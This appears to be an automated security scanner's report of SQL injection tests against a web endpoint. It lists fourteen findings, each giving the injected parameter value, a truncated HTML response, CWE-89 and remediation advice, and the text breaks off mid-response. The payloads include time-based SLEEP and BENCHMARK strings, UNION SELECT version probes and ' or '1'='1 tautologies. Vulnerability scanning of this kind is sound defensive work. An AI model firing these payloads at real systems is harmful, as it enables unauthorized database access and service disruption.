\nParametersName Value\ndemouser@\ndeepfence.ioor SLEEP(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #560\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io&&SLEEP(5)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #561\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioadmin' #\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #562Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io@@variable\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #563\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL \nSELECTCHAR(88)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #564\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #565\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(\n88)+CHAR(88)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #566\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io test%20UNION%20select%201,%20@@version,%201,\n%201;\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #567\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL \nSELECTCHAR(88)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #568\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters demouser@deepfence.io admin') or ('1'='1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #569\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 2947=LIKE('ABCDEFG',UPPER(HEX(\nRANDOMBLOB(500000000/2))))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@deepfence.io\nCWE-ID CWE-89\nIssue Number #570\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #571\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin\" or \"1\"=\"1\"--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #572\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'\n)),4,5,6,7,8,9,10--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #573Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\" or \"\"-\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script 